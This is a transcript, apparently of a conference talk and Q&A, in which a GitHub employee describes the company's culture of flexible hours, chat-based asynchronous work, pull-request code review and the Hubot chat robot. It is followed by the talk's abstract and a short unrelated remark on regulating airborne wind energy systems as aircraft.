I don't understand why people forget this. GitHub is no different. We have tons of different families. We have tons of different kids, which is kind of awesome at this point. John Maddox a couple weeks ago had a kid; he's now a new dad. Tom Preston-Werner, our founder, is going to have his first kid. Paul over there in the audience, he spoke yesterday, is going to have his kid later this year. Beth just announced that she's going to have hers. The point I'm making is that it's good to embrace this sort of stuff. It's good to realize that people have lives outside of work. This is probably my favorite slide I've ever done, because this is the whole GitHub family. I can embrace these people because they're all sort of like my kids; they're all people I like to hang out with outside of work, because it's good. It's good to realize that people have lives outside of work, because if you help them support that, they're going to do better code for you. They're going to come back to work really happy. They're going to come back to work really jazzed up to do that. So that's what I would say: be a family company. That helps out people who may be single, who may not have families of their own, because being family friendly lets you try a lot of different things out. You can be much less hour-centric. You don't have to worry about coming to work at certain hours. You can let people be flexible around their own hours and so on. And I really think that happy coworkers mean really productive companies. If you let people work on their own lives just as much as they work on their company, that's just going to end up being so much better for you. All this depends on a lot of trust, though. You really have to trust your employees to have all this power over their own decisions and destiny. And I think that's fine, because you hired these people. The number of times people will go through weeks of interviews and stuff with a company and then the company throws all this management stuff on top of them; that doesn't make any sense. It's like they trusted you enough to hire you and pay you money, but then they put all these micromanagers on top of you, where you have to come into work and come to all these meetings and stuff like that. I think that's really hostile. So basically you have to trust your employees, help them out if they're running into any problems or anything like that, and then verify they're doing work. Just every now and then check in, make sure that they're running into no problems, or if there is something, fix it. And that basically just requires communication. We do a lot of this stuff. We talk to people, try to figure out what's preventing you from shipping this feature. Is there anything that's a problem? Do you have any time constraints, anything like that? All you have to do is just have that communication; it goes a really long way. So in general, I think hours are bullshit. I think it's really hostile that our industry for some reason just thinks that if you throw hours at a problem, it's going to be a good thing. I don't think it is at all. Okay. I also want to talk about being asynchronous. And this is sort of my favorite part about GitHub. I think this is what makes GitHub a lot different from other companies. Asynchronous, in other words, just means a distributed way of getting things done. And we do that in a number of different ways at GitHub. One, we're very geographically distributed. Two, we're very attention aware.
Three, we're very team oriented. And four, we have very minimal process. And I'll get into each one of these individually. First of all, the geographically aware. GitHub is sort of headquartered in San Francisco. I finally looked at the numbers and we're about half and half people in San Francisco versus people in the rest of America, the rest of Europe, Australia, Asia. We're sort of all over the place at this point. And that's because it turns out the world's bigger than San Francisco. Like it would be great if you could hire everybody in your city and not have to look outside your little zone, but that's never going to happen. And that's great because we want to hire the best. And we don't have to worry about who happens to be down the street or who happens to be in our country. We can look anywhere in the world and figure out who we want to hire. So, with that under consideration, distributed work really needs to be a priority for us. We have to set up our company in order to work really well distributively so we can attract these people across the world and make them feel comfortable even though they may not be in the office with us every single day. Part of that is helped because of our flexible hours. Since we have no core work hours, you can sort of see work as being done at all times. You know, when America's sleeping, all of our European staff is sort of going hard at work or just, you know, talking, chatting, having social activity, whatever the case may be, there's always something happening now. And that's sort of been at the forefront of how we build our company for a long time. We're able to do this for a lot of different reasons. In general, we try to limit our in-person required contact. What do I mean by that? We do everything through chat. And I mean, if we're working on the same problem, in the same city, in the same office, on the same table, I'm still going to talk to you over chat rather than talk to you in person because, one, that gets people across the world involved in our conversation. So, if we're on some topic area that, you know, somebody in Europe has said, yeah, I've spent years on this, let me tell you my expertise on this, they would not have realized that we were talking about this if we were just talking about it over beers in San Francisco. And then, two, this means that everything is logged. So, three months from now, we can say, yeah, we discussed this a while back, what do we talk about, and you can just pull up the transcript. That's incredibly important. So, you can search through all the stuff that you talked about and have that physical log there ready for you to check out at any time. So, we pipe everything through chat. I'm going to talk about this a little bit more in the future. We've also been playing around with a few things. One of these is beer 30, which is sort of a weekly meeting we have at GitHub. It's sort of a stand-up meeting, 4.30, have a beer, and then usually the founders come out and talk about, you know, wherever the case may be, sometimes financial stuff, sometimes hiring, really big company, big picture stuff. And the important thing about this is that we live stream it so remote employees can see it in real time and then ask questions and feel like they are participating just as they were if they stood right next to them. Then we also record this as well. So, if you happen to miss the live stream, you can just download it and you can see exactly what happened, even though you weren't there present. 
Alongside that, we use FaceTime and Skype and a lot of stuff. This is our situation room in the office. We've got a nice table. We've got clocks on the wall, because clocks are important, I guess. There's a red phone there in case we want to nuke somebody, I guess. So, really important stuff. But we also have a bunch of iPads hooked up in there so you can FaceTime, put yourself on the TV. And this is really important if you're trying to feel somebody out for, like, an interview, and we don't want to fly them in quite yet and we want to get a feel for how they are in person. So that's really good. So in the cases where you do want to get a face-to-face experience, there are lots of obvious technical ways to do this. And then about once a week, we have a bunch of recorded talks at GitHub. Sometimes internal: if somebody is really excited about what they're working on or some new technology they're working on, they'll get up and talk in front of everyone else. Sometimes we'll have other startups or other companies come in and talk about their product or something they're interested in or working on. We had a couple PhD students come in and talk about their work, just as a fun way to broaden everyone's horizons. The cool thing about this is that it's hooked up to... it's an Arduino-based, Kinect-based motion-tracking automatic recording system, sort of. So, like, I can be up here on stage, and I've been told if I walk this far the camera can't see me. That's not the case in our office. The camera will track you with the Kinect. And then when you're done, that will get uploaded and then compressed and then delivered to our talks website, all automatically, because somebody was too lazy to press the record button and save. So that's really cool. But even though you're not in the office, you can see everything that happened through this talk wherever you are. So I've been sort of saying I hate humans, which is somewhat the case, but it's not totally the case, because I think it's really important to encourage this sort of structured team building from time to time. And we try to do this about twice a year, and then a couple other times we'll send people who are remote into the office just to meet people and get some actual face-to-face time, because it completely changes the game. This is 2010. We had a nice fancy dinner, all eight of us. And then Summit 2011, we had a nice little hotel weekend. And this was this year in San Francisco. We're already much bigger than this, which is crazy. But the whole point is that you get people meeting in real life. And especially if your whole life is sort of dictated by chatting with people and seeing their little Gravatar, it's really easy to say, no, I don't really care about what you're thinking, whatever. But if you actually talk to somebody in person, you make that personal connection, and you can get a better understanding of, well, if I do what I'm planning to do, I may actually screw this guy's life up a lot more. He may have to deal with more support tickets, or he may have to deal with the code fallout if I do this feature. So it really changes your opinion on how you work with your fellow employees. So it's really important: even though we generally eschew face-to-face meetings, if you have very structured face-to-face meetings, they can be extremely productive. Also, GitHub's really attention-aware. Again, we want to get people in the zone as much as possible.
We want to get people really happy, really productive, building really good code. And the problem is that anything pulling you out of the zone comes from distractions. So we try to minimize distractions as much as possible. Everyone has that experience where you're tapping away on code and you're really into it, and then you feel that tapping on your shoulder, and you're sort of talking to them, and you're still trying to type and get into it, and then you have to talk to them some more, and then you get them to buzz off, and then you get back to it, and you've totally missed your flow. And it takes you 5, 10, 15 minutes to get back to where you were. Like, that sucks. It takes a long time to get back into this sort of stuff. So we try to minimize these distractions as much as possible. One way we do this is we have no technical meetings, no stand-up meetings, no daily planning meetings, anything like that, partially because not everyone's in the office, partially because I don't think they're that productive. We can do all this stuff over chat. We also try to minimize in-person distractions. So again, if we're in the same office, rather than me going over and talking to you, I'll just ping you over chat. And usually everyone has a window that will pop up, and you can ignore that, and it's perfectly cool to ignore that if you're in the middle of work. And it's sort of accepted that I'll get back to you when I'm totally done and ready with, you know, what I've been working on right now. And that's great. We also have no managers. We're at 83 employees right now, and we still have no managers, which I think is phenomenal. I think managers are very distracting. I apologize to any managers in the audience. And I think for all this stuff, we're sort of a special case, and I realize that. And we can work this way for a number of different reasons. One, we're a product company. Whenever I give a talk similar to this, usually at the end of it somebody raises their hand and says, you know, how can I do this in my consultancy? And I'm like, you can't. That's sort of the trade-off between being a product company and, you know, working for somebody else: we have full control over a product, and we can build it as we see fit. That's really powerful. Secondly, we dogfood GitHub all the time. We're our number one users. And before you guys get upset about something, we're usually upset about it. We know what parts of GitHub we don't like, what parts of GitHub we really like, and all of the above. So that gives you a different perspective and allows people to work on what they want when they want. We also have full ownership. We never took VC, so we have entire control of the company. We don't have to answer to anybody who wants us to do some weird, wacky thing. And on top of that, we've been profitable since day one, basically. We've never been a company where your runway is measured in months; that completely changes your idea of what you need to do today versus what you need to do long-term. And we can focus on the long term and focus on what makes a really good product. But really, I think every company is different. And I think the main point of what I'm trying to say is that you have to analyze what you can do, what makes sense for your company. Maybe that's totally different from how we do it. And I think it's important to reanalyze yourself and figure out how you can change this as much as possible.
Because before long, if you've missed out on your opportunity, by the time you realize that you have missed out on it, it's far too late to change anything. Beyond that, as we've grown, I mean, I was employee number nine, and now, again, we're at 83, so I've seen how we've grown over time. Like many other companies, we've become much more team-oriented over the years. We have lots of different teams now, different native teams, different software teams. And obviously, this is great. This is sort of the standard way of attacking different things. Small teams let us move really quickly and independently, and we basically let teams be in charge of whatever product they're going to do. It's sort of the start-up-within-a-start-up feeling, where they're in charge of, like, the marketing, the direction, the long-term goals of the product, whatever the case may be. And it's really good to let them have the power to do that. We're able to do this practically in a lot of different ways. Mainly, we have different chat rooms for every single product, every single team that we have. So the Danger Room is sort of where you put funny cat pictures and animated gifs, because you've got to have one of those. If you don't have one of these in your company, I highly recommend it. It's amazing. We also have a room for serious talk. We have a room for the Enterprise team, who works on our Enterprise product, the design team, the support team, all of these different rooms where you can have focused conversations just on that product and just with that team. So if you ever have a question, you can go over to that room and have a discussion based specifically on that. Small teams let you focus. And that's mostly what we're trying to do here: you can break up your focus and then let them focus on what really matters. And then finally, one of the coolest things that I really like about GitHub is that we have very minimal process. I think there are a lot of us at GitHub who really hate process of all kinds. And we end up doing a lot of things to combat process at all steps of the way. So the question at this point is, how do we let people actually do all this stuff? And it's sort of a simple answer: we let people plan it, build it, and then ship it. So how do we actually do all that? So in the planning stage, if you have an idea for anything that you're interested in doing, you basically show it as soon as possible. As long as you get somebody to look at it quickly, that's good. So we do this through chat. People paste screenshots in all the time. The designer room especially is great: our designers will post, like, man, what if this page looked like this? And then at that point, everyone can say, yeah, that's great, work on it; or no, that's horrible, change this or do this. And it's good to get that feedback as soon as possible on what people want changed. We also use pull requests substantially. This is our form of code review. I'll get into this a little bit later. We also have a number of wikis and internal apps to help us align our ideas together. And I'll talk about this briefly. But in general, the whole point of this is to make sure that it's okay to say no. Both on the side of me saying no to your idea, and on your side, accepting somebody saying no to your idea. And that's sometimes easier said than done. You don't want to get into the case where, if I say no to something, you take that personally or anything like that.
And I think we sort of have developed a culture where we can say no to a lot of things and keep a very focused perspective on things. And that's totally fine. And if you really think that, you know, I'm totally wrong in saying no, you can say, well, I think you're wrong, and here's why. And then that sort of debate and argument is really good to have inside of a company. I was talking about internal projects and stuff before. This is one of them. This is GitHub Team, which is sort of our project management app. Everybody contributes to it. I mean, everybody. We have a lot of non-technical people, HR people, who contribute to Team. And that's good, because we can get ideas on interesting things. We can see status updates. We sort of use this as an internal Twitter. If you want to post a picture of something you're working on, it's kind of a nice way of saying, hey, check this out, getting people excited about it, getting people to help you out on whatever you're building. We can also avoid abandonment. We have a concept of projects in here where you can say, like, you know, I'm working on this, I need some help, and you can corral everybody in to help you out, since we have a decentralized way of making products where, you know, if I want to make something, I can build the back end, and then I sort of have to recruit a designer to help work on it with me. So from there, you sort of vote with your work: if you think an idea is really good, join them on it. But you can't just say, yeah, I think we should do that, and then just ignore it yourself and not work on it. So when we move from the planning stage onto the building stage, you have to look at how you actually build it. And one of the biggest foundations of this is how you branch code. How you build your code, how you actually ship your code. I've done a lot of support and stuff like that for large enterprise-y companies, and it's weird what people think are good branching strategies for Git, Subversion, CVS, whatever the case may be. We tend to use Git, but in general it's just strange how people put all these different permission structures and stuff on top of repositories, and it gets really confusing. So this is what we do. We use Git, obviously. We have our master branch in Git. We branch off of that if you ever want to do a bug report, a bug fix, or a feature, or anything like that. And then you send a pull request and it gets merged back in. That's it. The whole point is that it's very simple. And part of the reason behind this is that it's very designer-friendly, and by that I mean friendly to non-technical people. We do hire people who don't know Git as well as we do, and we still want them to feel like they can understand the concept behind getting their code into production as fast as possible. We try to have somebody ship something into production either their first day or first week of employment, because we think it's really good to get people doing real stuff as soon as possible, rather than waiting months and months and months before their first contribution to the company. This is also good for us because we can do really simple rollbacks. If we do everything on a branch, even for a bug fix, we can quickly roll back. This is important for us because we can deploy 30, 40, 50 times a day. So when you're doing that sort of stuff, if you deploy a branch to production, you can quickly roll back in a bunch of different ways. We can do partial deploys.
We can deploy the code base just to our staff, so we let our staff bang on it for a little bit. You can deploy to specific servers. You can deploy to specific processes on specific servers. And the whole thing is to limit our exposure in case a bug gets out there or something breaks or something unforeseen happens. And this is all helped because we have a very simple, basic branching strategy at our base. We don't have to go through some really complicated QA system or anything complicated like that. I mentioned earlier that we use pull requests substantially, and I wanted to talk a little bit about that. In general, I've worked at a few companies where you project code on a wall and you go through it line by line, saying, like, yeah, is this good? Is this horrible? What do we want to do here? And if you're ever doing that, it is the worst thing in the world. That's code review, I guess, but it's a horrible code review. And we eschew all of that and do everything in pull requests. In general, pull requests are basically discussions about code. You push a branch up to GitHub and then you can discuss that branch before it goes into production. And we do this for everything. We do this for stuff that is one commit and changes one line of one file, just because that line is really, really important and we want people's feedback on that particular change. And we do this over a period of months. We've had some pull requests that have been alive for three, four, five, six months, active at certain points, and had dozens of people contributing to them, because it was a really big change, or it was a really long change, or it had a lot of copy changes, whatever the case may be. It's a really nice way of getting all this discussion together and correlating it with code. The general workflow is: you push a branch up, you get feedback on it, you make improvements, you push code back to that pull request and let it grow, and you merge that branch back in. Again, it's a very simple flow. It's something that somebody can figure out on their first day. You don't have to go through a QA department. You don't have to go through anything like that. And it's a nice way to do it. It's very asynchronous. It's non-invasive, meaning I don't have to go over to your desk and tap on your shoulder and say, hey, can you review this code so I can push to production? I can just make my pull request, and then your email will pop up: Zach has made a pull request, can you check it out? And we tend to do it based on, I've been involved in the billing code, therefore I should check out the billing pull requests. Or it's your area of the company, so you should review those pull requests. It's sort of a responsibility type of thing. They're extremely visible for your organization. So if I do a pull request, again, it sends out an email to everybody in the organization, but it also shows up on your dashboard, and it shows up on the pull request page. All that sort of stuff makes it very accessible to everybody. There's a nice one-click merge button if you don't want to deal with all of the Git silliness and merging stuff. And then again, this sort of replaces our traditional code review. And I think that's really big. When you move from a structured code review into letting people review stuff on their own time, where you don't have to pull yourselves away from whatever project you're working on, that becomes incredibly important.
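The branch-and-pull-request flow described above is simple enough to sketch as a handful of Git commands. This is only an illustration: the branch name, the remote name, and the deploy step are assumptions on my part, and GitHub's actual chat-driven deploy and partial-rollout tooling is not shown here.

    # start a bug-fix or feature branch off master (the default branch at the time)
    git checkout master
    git pull origin master
    git checkout -b fix-billing-typo        # hypothetical branch name

    # commit work and push the branch up so a pull request can be opened on github.com
    git commit -am "Fix typo on the billing page"
    git push origin fix-billing-typo
    # ...open a pull request in the web UI, gather feedback, push more commits...

    # once the pull request is approved, merge it (merge button, or locally) and deploy master
    git checkout master
    git merge --no-ff fix-billing-typo
    git push origin master

    # if the change turns out to be bad, one quick rollback option is reverting the merge commit
    git revert -m 1 <merge-commit-sha>
    git push origin master

The revert with -m 1 puts master back to its first-parent state from before the merge, which is one simple way to get the kind of quick rollback described above; deploying only to staff, to specific servers, or to specific processes is a separate layer on top of this.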
Then once you ship it, just quickly: we spend a lot of time on our test suite. We consider fast tests to be really important, especially if we're deploying code the dozens of times a day that we do. We want tests to be really quick. At this point, our test suite is something like 14,000 assertions in 200 seconds, which is still way too slow. We'd like this to be even faster, but, you know, it's important that the code you push is also fast in terms of tests. We sort of view a slow test as a regression. So if you push something that slows down the test suite a lot, you know, that's almost as bad as pushing a bug to production. The faster you can have tests run, the faster you can push to production, the faster you can move as a company, and that becomes really awesome. Our test suite has actually gotten faster as we've grown with more and more people, which is kind of amazing to me. So in general, I don't think you need distractions. I think they're kind of bad. Any sort of required physical presence is just tricky. You don't need to be in the same country, and you don't need a lot of process. This is one of those things where people default to throwing process at the problem when something smarter would do. The number of stories I've heard from friends where somebody pushes a bad build to production, and then at that point everything blows up, and then the bosses say, okay, now we've got to have QA, now we've got to have reviews, we've got to have sign-off, we've got to do all these things. That's just really depressing. It should be much more accepting. If you push a bug to production, fix the bug, and then move on. That's how you build better code from that point on. You don't have to layer process on top of it. It slows you down. It makes for a worse product overall. Finally, I want to talk about sort of an internal thing that we say at GitHub, which is optimizing for happiness. And this is one of the most important things at GitHub as well. GitHub, when we started out, was just a couple of people in 2008, and then in 2009 we added a few more, and in 2010 we added a few more. This was last year, and then this was last month. We've grown dramatically over the last few years for a startup. And that's really great. Adding people is always a good thing. We're at 83 employees right now, but that's not the number that's interesting. The really fascinating number for GitHub is that we've never had anybody leave. And that is phenomenal considering we are in the computing industry in general, and we're in Silicon Valley on top of that. I've heard stories of people jumping from company to company every six months because they can just get their salary raised 10% with every single job they get, just based on the salary they had at the last company. So people tend to jump around companies a lot, and I think it's really horrible, because no one really understands how much of a problem that is. If you lose somebody, you lose all of their institutional knowledge, which sucks. But then it takes weeks or months to try and find somebody to replace them, and it takes weeks or months for that person to come up to speed to where the person whose knowledge you lost was at. And it really sucks to lose people. So we try to figure out ways to mitigate that. How do we sort of imprison people into happiness, where they never, ever want to leave GitHub, you know? And we've come up with a number of different ways to do that.
So in general, how do we make a happiness-oriented workplace is what I'm trying to say. Most of the time people leave because of burnout, at least from what I've seen. Sometimes people leave for better job opportunities, stuff like that, but a lot of the time people just get burnt out on whatever they're doing. And there are lots of ways you can combat that. One is exploration, letting people explore their own boundaries. Two is letting them have a lot of freedom. And then three is having a lot of self-direction in your job. So in terms of exploration, we do this in a number of different ways. We have lots of shared side projects at GitHub, and this is really kind of fun. I don't know if any of you guys know Hubot. Hubot's our chat room robot who sits in all of our chat rooms, and we can talk to him. He began as kind of a weird thing, and you can have him do funny stuff like put mustaches on images, find animated gifs and all these memes and all that silly stuff. But we also have built lots of crazy stuff into him, too. Like, he deploys our entire site. So a designer on his first day can type "hubot deploy github to production", and that deploys it to all of our 50, 60-some servers, restarts the correct processes, does all the code checkout, compiles our assets. There's a whole laundry list of stuff that it does, but he doesn't have to worry about that. He just has to type "hubot deploy github to production", and that's it. You can do tons of shell commands, and all of our graphing is done through Hubot. There's lots of real business stuff we do through Hubot as well. But the whole point here is that it's a shared side project that we can all hack on. He's written in JavaScript, so he's accessible: JavaScript is sort of the glue language between people who may know, like, Windows technologies versus PHP or Ruby or whatever the case may be, so it's much more accessible for our designers and developers to work on him. And we encourage this: man, if you're really burnt out on whatever project you're working on, even though that may be a really interesting project, sometimes you just want to fart around for half a day and say, man, I want Hubot to return smart-alec responses if I ask him about, I don't know, World War II or something like that. And that's good. If it makes a really interesting culture for the rest of the company, that's cool, because not only will there hopefully be something interesting coming out of your hacking on this side project, but it also puts you in a better place mentally and emotionally, where you can say, man, I'm just going to work on something fun and easy and interesting and something that challenges me as a person. We also have a ton of different internal apps. This is from Help, which is our sort of help slash support system. And this all stemmed from one of our support guys saying, man, I really hate our support system, I'm going to build an app that manages my queues a lot better. And then a few months later, someone came by and was like, hey, this is cool, I'm going to make it look pretty. And then before we knew it, like four or five months later, just on the side, we had this amazing support site. And this is great because now all of our support people can use Help, and it totally changes their lives. Like, it literally makes them more productive, more happy to work for us.
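To make the Hubot part of this concrete, here is the kind of chat interaction being described. It is only an illustrative sketch: the exact command phrasing and the responses are assumptions, not a transcript of GitHub's real Hubot scripts.

    # an illustrative chat session with a Hubot-style bot (commands and output are hypothetical)
    you>   hubot image me corgi
    hubot> http://example.com/images/corgi.jpg

    you>   hubot graph me exceptions over the last day
    hubot> http://example.com/graphs/exceptions-24h.png

    you>   hubot deploy github to production
    hubot> deploying github/master to production... done

The same interface a designer uses on day one to fetch a silly image is the interface that drives deploys and graphs, which is part of what makes a bot like this such an approachable shared side project, and the same spirit carries over to internal apps like Help.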
So by going out of your way and saying, I'm not going to work on my normal job today, I'm going to work on some internal app, you're helping yourself, because you're breaking up the grind of working on normal work stuff. But you're also helping the rest of the company work better at their own jobs. We also do a lot of just weird stuff like hardware hacking. This is an iPod touch connected to flat screens in our office, because somebody said one day, hey, I want to be able to push random URLs to TV screens around the office. So somebody made an iOS app, very cheap, and an iPod touch is pretty cheap, and connected it to a TV. And now from Hubot, you can say, Hubot, push this URL to this particular TV, and then you can put our nice load graphs or something on that particular TV, or whatever the case may be. This is also really cool because even if you're not in the office; I know one of our sysadmins in Japan had his iPad next to his screen with all of the load graphs and stuff using this app. So because we built this the way we did, now he can get all of his graphs and feel like he's getting sort of the office experience just from sitting at home. And that's an unintended good side effect that came from this. So we encourage a lot of that stuff as well. We also have something called Play. We're kind of a weird, eclectic musical group at GitHub. A lot of us are artists, so we have music playing all the time, which is kind of awesome. The challenge is, how do you control who plays what on the speakers? So we built sort of a DJ app where you can request, again through Hubot, "hubot play Daft Punk", and then it will queue up 10 Daft Punk tracks and play them over the speakers, and that's great. And again, since we don't want this to be office-only, we stream this for all of the other employees to listen to at home. It seems sort of stupid, maybe, and I was skeptical at first, but as soon as something comes on, like Garth Brooks comes on, then everyone's like, what the hell is playing? And then people start talking about it. You sort of mitigate that experience of being remote, basically, where you can say, man, we're listening to the same thing across the world, and it's kind of amazing. It's, you know, bringing people together. So stuff like that's kind of fun. We encourage people to work on these shared side projects because it brings people together in interesting ways that they wouldn't otherwise, and it keeps people fresh when you're actually building these fun things. Beyond that, we encourage people to broaden their horizons intellectually. We buy Kindles, and we'll give out e-books to everybody in the company as well. A couple months ago, we got React books for everybody in the company because people wanted to learn React. Not necessarily because we're going to use it in production, although we do, but it's good to get people trying out new technologies, just because it keeps people fresh, keeps people interested in new solutions. A while ago, people wanted to hack on Arduino. If you're not familiar, Arduino is just open source hardware hacking, which is great, especially for a lot of the designers, a lot of people who are only in the software world, who have never done hardware hacking before. We had somebody come in and let people build little tiny gizmos and stuff.
That was awesome, very different from the normal day-to-day job, and you get a different perspective on different kinds of programming, different kinds of technology. And then somebody wanted to learn Spanish, so we brought in a Spanish tutor, and eventually the dude went and gave a talk in Spanish somewhere in a Spanish-speaking country, which is the craziest thing I've ever heard, and frightening. And then beyond that, along the lines of broadening your horizons intellectually, we encourage a lot of networking. If you get accepted to speak anywhere in the world, GitHub will send you and a travel buddy, another employee of GitHub, to go there, because it's important to get out there and see new things. One, it's really good marketing for us, obviously, I guess; your talk is probably good, unless your talk is horrible. And then we'll usually sponsor drink-ups in the city, so you can meet people locally and just enjoy socializing with people. And meeting people is sort of the best part of all this. One, you can hire them, and we do hire lots of people that we meet at conferences and drink-ups and stuff like that, just because it's a nice atmosphere to meet people in. But in general, socializing is really fun. Because of this sort of stuff, I've been sent to really weird conferences that I never would have gone to otherwise. Strange Java conferences in the middle of, like, rural, random countries. And it's phenomenal, because I end up catching these talks that I'll never use in my day-to-day work, but just being there gives you a different perspective on things. It sort of grows your mind, you get to talk to people about different technologies that you wouldn't otherwise and compare notes on how things are going. And again, you're trying to minimize the burnout that comes from working on the same stuff all the time. If you can encourage people to get out of their comfort zone and do some stuff like this, that's really awesome. So burnout happens when you're not personally growing. I really think that's an important thing for GitHub: we try desperately to make people grow throughout their employment. Beyond that, we try to give employees a lot of freedom as well. I mentioned earlier we have no set hours, partially because we couldn't, in terms of international employees; I wouldn't know what hours we would set where people would have to wake up at, like, three in the morning, something insane like that. We have no managers. We have no meetings as well, which is great. There's basically no need to be in the office. We have a lot of San Francisco people who actually don't go to the office, because they're just not productive there. You know, when it's time to ship the really impressive code that they want to push out that day, they go to a cafe, because the cafe is where they're most productive. That's not me; that is crazy to me. But we want to support that. We want people to be productive wherever they are. And then on top of that, we have no vacation tracking or anything like that, which is just another small way of saying, you know, we trust you to make smart decisions about how you treat your time. And between those last two things, you don't have to be in the office and you can take vacations whenever you want, we encourage people to travel all over the place.
A bunch of us shared a ski condo last year with a whole bunch of GitHubbers, just so we could go ski and then hack from the ski mountain, which is great. Just a change in venue is really healthy sometimes. And then finally, just self-direction: giving people a sense that they actually have power over what they do is really important. We let people work on things that interest them. They basically choose what they want to work on. And that is really kind of rare. We don't really have bosses that say, alright, now, Joe, work on this, and Nancy, work on this, and you have to be done with this by this date. We don't really have deadlines at all either, because we trust people to work on something and be done with it when it's ready. And again, we have teams, but our teams are set up so that it's very easy to move around. And that's the problem with teams if they're so structured that you can't get out of them. If I want to bounce around on the Enterprise team for a week because that's interesting to me, or they need my help with some particular problem that they're facing, I should feel totally fine doing that. That's actually exactly what I do at GitHub now. I started out working on GitHub Firewall Install, and it was just me for a year and a half, and now we have a team of about 15 people doing the job I was doing, which makes me feel amazing. But before that point, I was just kind of burnt out, and I talked to the founders about this, and I was like, yeah, I'd like to just work on something else. So I'm off that team now, and, you know, I'm not burnt out anymore, and I can drift in when I want to work on that, and it's great that you can move around; it totally changes your perspective on feeling trapped inside of a company. So in general, just keep your employees really, really, really happy. Think about what works in your situation. What do your employees value? Is there anything that you can do differently today that can change things? So in conclusion, just be flexible about stuff. Be flexible about hours, be flexible about requirements, process, anything like that. Build a company you want to work for, and again, I want to stress that I don't think this is necessarily a founder thing. I don't think this is a manager thing. I think the most change can come from the lowliest employee, willing to say, okay, what can I change in my day to day? What can I mention to people so that maybe we could structure the company differently, where it's more interesting to work, or we can get people really excited to come into work? And then finally, just push for happiness. I don't know why we would do this stuff unless it made us happy. It's the most insane industry in the world, where we can build stuff out of our minds and then push code and then make money on it. It's amazing. So thanks. I mean, this is basically how it really works, to be honest. In terms... No, we've definitely fired people. We've definitely fired people. Nobody has left willingly, which I think is a far more interesting statistic. Yes. I was going to get to it. So in terms of that, in hindsight, with all those people that we've ended up letting go, I don't think it's been much of a surprise, especially for the people on the particular team that they were on, at least from what we've seen so far.
The people who are sort of in charge of that team, or who are spiritually the leader or whatever, tend to have a really good idea about who is pulling their weight and who isn't. And it's sort of informal. We don't really do checklists like, are you a douchebag? Yes? Then you're fired, or something like that. So it's much more of a case-by-case basis, because we haven't gotten to the point where we've had to fire a lot of people. So there's no real structure surrounding that, but there is sort of a feeling of, you know, people tend to know, because we do have a very strong culture of everyone should be shipping something, everyone should be contributing, everyone should be doing something productive. And it's hard to be in that zone and still feel like it's equitable if somebody else is not pulling their weight over on some other team or something like that. Yep. What was that? I think that nobody having left is a good sign that everyone's happy. Again, we're sort of the company where we tend to talk a lot outside of work, and you can get a pretty good barometer of how happy people are. A number of times I've literally just asked people, like, are you happy here? Is there anything we can change? Is there anything that we can do differently? And we have lots of discussions internally on GitHub Team, our internal app, of, like, you know, expense reports really suck, how can we make this better where I don't have to worry about this stuff? Or, like, you know, here's some stress point, this sucks, how can we make this better? We reanalyze all those points all of the time. And literally there's something every single day, some internal thing, that somebody is angry about and wants to change for the better. And it's sort of a culture built up to support that, where you're constantly improving the internal culture. What's the average amount of time that you spend working, a reasonable number of hours? I think... not that many hours. No, it's definitely a reasonable amount. And for me, when I'm in town and actually doing, you know, non-travel work, I'll probably do five or six hours at the office, then go home and then sort of sit online until I go to sleep, just shooting the shit in the Danger Room, slash, you know, responding to emails, doing whatever. But that's sort of off work. That's the soft, you know, discussion side of things rather than doing actual code. So it can go back and forth depending on the day, the week, the month, or whatever my schedule is outside of work. But again, you want to feel like you're pulling your weight, but not overwork yourself. What if something happens in somebody's life that's... Yeah, that's fine. Yeah. No, we had a... yeah, something definitely happened a few months ago to one of our employees, and he basically just took a couple months off and no one really, you know, worried about it. And he's doing half-time or something like that, building back up. Do people stress about when they feel they have to come back? We're cool with whatever you want to do. If you think that it's good, like, seriously, if you think that it's cool for you to be back at work, if you think it's cool for you to be doing the stuff that you're doing, we trust you that that is the right decision for you to make. What's your gender ratio? Not good.
I'm just wondering, seriously, do you guys have a plan to get a better ratio? That is something that we are definitely improving on. I want to say we're doubling our female employees in the next few weeks, which I'm really excited about, but it's still abysmal. No, I think we're doing... maybe you guys can help me out. I think we have, what, four total right now? Five out of 80. And then we're hiring more. Yeah. Which is still abysmal, but then again... man, tech blows for that. That's one of our major problems, I think. Yeah. Yeah. We need to be actively changing this; we can't just expect it to fix itself. Do you have to actively hire people who fit your culture, or do you try to get new people to embrace the culture? Because some people are different; they want something more structured. Or do you have some people who... Yeah, it's... I think in hindsight, with some of the people we let go, that was sort of the problem: it wasn't a slight to them, it was just that they couldn't really handle that type of freedom, and they were just better in a much more structured environment. Which is understandable. It can be really strange and intimidating your first day when it's just like, all right, work on something. And it's like, what? So we try to find people who, one, have done open source work, because that's a really good indicator that, you know, you're doing this on your own time, and you know how to build something interesting and deal with users and stuff like that. Or just people who show an interest in, you know, just building a product, who really can work on their own time and stuff like that. The problem is it's kind of hard to judge when you're just meeting somebody, or have only known them for a couple of weeks beforehand. But there's also, I mean, we're really kind of hands-on for a while. Like, the first week you'll be paired up with a buddy or something like that, so they'll help you learn the ropes, help direct you and guide you. And then for your first few months, we're always checking in to make sure that, you know, you're feeling comfortable and stuff like that. So it's sort of a give and take on both sides of that, I think. Anybody else? Cool. Thanks.
|
GitHub consists of a bunch of employees who have worked at other companies in the past and despised it. Okay, maybe they weren't all terrible jobs, but a lot of us remain skeptical of most software development practices. We do things differently at GitHub. We don't have meetings, we don't have managers, we don't do traditional code review, and we aren't always in the same room, much less on the same continent. And we couldn't be happier about it. We ship code quickly, without a lot of red tape, and still maintain an incredibly high level of code quality. It's a great way to keep your developers happy, and we think it can work in your company, too.
|
10.5446/50840 (DOI)
|
My name is Editha Momen, I'm from Arthur University, and my background is aviation; before I joined the department at the university I was working at Havas. We had a discussion before, and I consider an airborne wind energy system as clearly an airborne device, something which is in the air and is using the airspace, and I propose to consider it as an aircraft, the system which is flying here, because that is where a lot of, maybe most of, the risk comes from. So I just want to first comment on one of the sentences you said in the very beginning: to ensure safe operation, because any accident can harm the entire sector. The statement is right, but it should not frighten us, because we know there will be accidents. The only thing, and I know this from my own aviation work at Havas as well, is to make clear, if something happens, that you worked properly according to safety standards; aviation does a lot here, too. And one good thing: we are using the term certification in aviation, but I do not personally recommend using this term in airborne wind energy. I would rather call it qualifying the system with appropriate safety standards; that's what we need to achieve. And the good thing is that currently the regulations for unmanned aerial systems have changed in Europe. We've seen it on your slides: EASA came up with new rules, there will be more in July next year, and they invented a special category, the so-called specific category, so it's not open, it's not certified, it's something in between, and this allows us the flexibility to make it work properly. And that's why I want to make the point strongly: consider this system as an air vehicle, and it will not be a lot of pain. Thank you.
